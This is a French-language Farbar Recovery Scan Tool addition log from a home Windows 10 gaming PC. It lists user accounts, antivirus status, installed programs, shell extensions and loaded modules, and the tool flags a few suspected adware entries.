Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 05-06-2019 01 Exécuté par Luca (05-06-2019 21:55:26) Exécuté depuis C:\Users\Luca\Desktop Windows 10 Home Version 1809 17763.503 (X64) (2018-11-27 21:23:48) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-3183337316-3821782573-710669081-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3183337316-3821782573-710669081-503 - Limited - Disabled) Invité (S-1-5-21-3183337316-3821782573-710669081-501 - Limited - Disabled) Luca (S-1-5-21-3183337316-3821782573-710669081-1001 - Administrator - Enabled) => C:\Users\Luca WDAGUtilityAccount (S-1-5-21-3183337316-3821782573-710669081-504 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) 7-Zip 18.05 (HKLM-x32\...\7-Zip) (Version: 18.05 - Igor Pavlov) 7-Zip 19.00 (HKLM-x32\...\{23170F69-40C1-2701-1900-000001000000}) (Version: 19.00.00.0 - Igor Pavlov) AlphaConsole version 9.9.11.0 (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{CCCDBFCF-CD8B-4728-915A-DCB71C1118BE}_is1) (Version: 9.9.11.0 - AlphaConsole) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.4.1 - Advanced Micro Devices, Inc.) Apex Legends (HKLM-x32\...\{D7FBF176-382D-484E-863A-DFD1124A2A1C}) (Version: 1.0.1.0 - Electronic Arts, Inc.) Avast Antivirus Gratuit (HKLM-x32\...\Avast Antivirus) (Version: 19.5.2378 - AVAST Software) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden Call of Duty Black Ops 4 (HKLM-x32\...\Call of Duty Black Ops 4) (Version: - Blizzard Entertainment) Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden CloudNet (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version: - ) Darksiders III The Crucible (HKLM-x32\...\Darksiders III The Crucible_is1) (Version: - ) Discord (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\Discord) (Version: 0.0.305 - Discord Inc.) DiskProtect9527 version 10.16 (HKLM-x32\...\{BA260FCE-F1C0-42D5-BD87-EB3EDF11252F}_is1) (Version: 10.16 - ) Epic Games Launcher (HKLM-x32\...\{328902CF-CDEF-4124-B1FE-2E4D026C5750}) (Version: 1.1.195.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Far Cry New Dawn (HKLM-x32\...\Uplay Install 5210) (Version: - Ubisoft) FileZilla Client 3.42.1 (HKLM-x32\...\FileZilla Client) (Version: 3.42.1 - Tim Kosse) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 74.0.3729.169 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden Java 8 Update 211 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180211F0}) (Version: 8.0.2110.12 - Oracle Corporation) Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited) Microsoft Office Famille et Étudiant 2016 - fr-fr (HKLM\...\HomeStudentRetail - fr-fr) (Version: 16.0.11629.20196 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation) Minecraft (HKLM-x32\...\{2D1ED4EA-B59D-4665-ACB3-9325872A300D}) (Version: 1.0.4.0 - Mojang) MorphVOX Pro (HKLM-x32\...\{2a0101fe-5c87-4a07-86a1-aa818daa5389}) (Version: 4.4.77.16840 - Screaming Bee) MorphVOX Pro (HKLM-x32\...\{F14B768E-0491-4AC5-B16E-4079BC14AB78}) (Version: 4.4.77.16840 - Screaming Bee) Hidden MSI Afterburner 4.6.0 (HKLM-x32\...\Afterburner) (Version: 4.6.0 - MSI Co., LTD) NativeDesktopMediaService (HKLM-x32\...\{4CF9B388-78FA-46C3-B409-196FE2CF5F20}) (Version: 3.6.0 - Jetmedia) <==== ATTENTION No-IP DUC (HKLM-x32\...\NoIPDUC) (Version: 4.1.1 - Vitalwerks Internet Solutions LLC) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.7 - Notepad++ Team) NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation) OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.0.2 - OBS Project) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 10.5.40.26928 - Electronic Arts, Inc.) Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment) Planet Coaster version 1.3.6.45104 (HKLM\...\Planet Coaster_is1) (Version: 1.3.6.45104 - STEAMPUNKS) RivaTuner Statistics Server 7.2.1 (HKLM-x32\...\RTSS) (Version: 7.2.1 - Unwinder) Roblox Player for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-player) (Version: - Roblox Corporation) Roblox Studio for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-studio) (Version: - Roblox Corporation) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Streamlabs OBS 0.12.3 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 0.12.3 - General Workings, Inc.) The Forest (HKLM-x32\...\The Forest_is1) (Version: - ) theHunter Launcher (HKLM-x32\...\FBDFBE7F-2DB8-47E2-B88E-32F4A2A74AA8_is1) (Version: 819 - Expansive Worlds) Twitch (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.) Uplay (HKLM-x32\...\Uplay) (Version: 85.0 - Ubisoft) WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH) YoutubeAdBlock (HKLM-x32\...\1655C0CA-7AE7-4012-8502-970C8675E5F8) (Version: 2.0.0.868 - Company Inc.) <==== ATTENTION Packages: ========= Adblock Plus -> C:\Program Files\WindowsApps\EyeoGmbH.AdblockPlus_0.9.15.0_neutral__d55gg7py3s0m0 [2019-05-01] (eyeo GmbH) Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.13.5.0_x86__kgqvnymyfvs32 [2019-05-17] (king.com) Candy Crush Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSaga_1.1520.1.0_x86__kgqvnymyfvs32 [2019-06-03] (king.com) Courrier et calendrier -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe [2019-05-31] (Microsoft Corporation) [MS Ad] Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_2.4.521.0_x64__rz1tebttyb220 [2019-03-13] (Dolby Laboratories) Fitbit Coach -> C:\Program Files\WindowsApps\Fitbit.FitbitCoach_4.4.133.0_x64__6mqt6hf9g46tw [2018-11-27] (Fitbit) HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_95.1.531.0_x64__v10z8vjag6ke6 [2019-03-19] (HP Inc.) Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad] Microsoft News: les actualités à ne pas manquer -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.30.10924.0_x64__8wekyb3d8bbwe [2019-04-04] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.3.4032.0_x86__8wekyb3d8bbwe [2019-04-09] (Microsoft Studios) [MS Ad] MSN Météo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.28.10351.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad] Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.93.375.0_x64__mcm4njqhnhss8 [2019-02-19] (Netflix, Inc.) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) CustomCLSID: HKU\S-1-5-21-3183337316-3821782573-710669081-1001_Classes\CLSID\{9EF3A253-D2B1-4474-B7F5-3B9A82E0E7E4} -> [MEGA] => C:\Users\Luca\Documents\MEGA [2019-06-05 19:37] ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software) ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé] ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2019-01-27] (Notepad++ -> ) ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software) ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software) ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé] ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> ) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-03-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé] ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal) ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\Luca\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ShortcutWithArgument: C:\Users\Luca\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ==================== Modules chargés (Avec liste blanche) ============== 2019-05-25 20:52 - 2019-05-25 20:52 - 085602816 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libcef.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000089600 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libEGL.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 003841536 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libGLESv2.dll 2018-12-24 23:48 - 2018-12-24 23:48 - 098275328 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll 2018-12-24 23:48 - 2018-12-24 23:48 - 000092672 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll 2018-12-24 23:48 - 2018-12-24 23:48 - 003922432 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll 2015-07-20 17:34 - 2015-07-20 17:34 - 000073728 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducapi.dll 2015-07-20 17:34 - 2015-07-20 17:34 - 000012288 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducservice.exe 2019-04-30 17:59 - 2019-05-25 09:55 - 000015360 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libEGL.DLL 2019-04-30 17:59 - 2019-05-25 09:55 - 003090944 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libGLESv2.dll 2019-06-04 01:07 - 2019-06-04 01:07 - 000048664 _____ () [Fichier non signé] C:\Program Files (x86)\Sanguinis\trixie.exe 2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll 2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll 2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Device.dll 2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Platform.dll 2019-06-04 02:02 - 2019-06-04 02:02 - 000342528 _____ () [Fichier non signé] C:\ProgramData\Quoteex\Sailin.dll 2019-06-04 20:40 - 2019-06-04 20:40 - 001687552 _____ () [Fichier non signé] C:\Windows\xrcrgimbc.xocr 2019-03-26 23:38 - 2019-03-26 23:38 - 000043008 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe 2019-03-26 23:38 - 2019-03-26 23:38 - 000572928 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe 2019-05-25 20:52 - 2019-05-25 20:52 - 001463808 _____ (Firelight Technologies) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\fmod.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000596992 _____ (The Chromium Authors) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\chrome_elf.dll 2018-12-24 23:48 - 2018-12-24 23:48 - 000547840 _____ (The Chromium Authors) [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll 2019-02-09 20:05 - 2019-02-09 20:05 - 000002560 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icudt58.dll 2019-04-30 17:59 - 2019-02-09 20:05 - 001252864 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icuuc58.dll 2019-04-30 17:59 - 2019-02-09 20:05 - 001548288 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\LIBEAY32.dll 2019-02-09 20:05 - 2019-02-09 20:05 - 000395776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\ssleay32.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000030208 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qgif.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000032768 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qico.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000256512 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtga.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000305152 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtiff.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000025600 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll 2019-04-30 17:59 - 2019-05-25 09:55 - 000278016 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\mediaservice\dsengine.dll 2019-02-09 20:05 - 2019-05-25 09:55 - 001611264 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\platforms\qwindows.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 005487104 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Core.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 005841920 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Gui.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000709120 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Multimedia.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 001179136 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Network.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000207360 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Positioning.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000310272 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 003513344 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Qml.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 003390976 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Quick.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000068096 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000045568 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000116224 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebChannel.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 054064128 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000211456 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000146432 _____ (The Qt Company Ltd) [Fichier non signé] 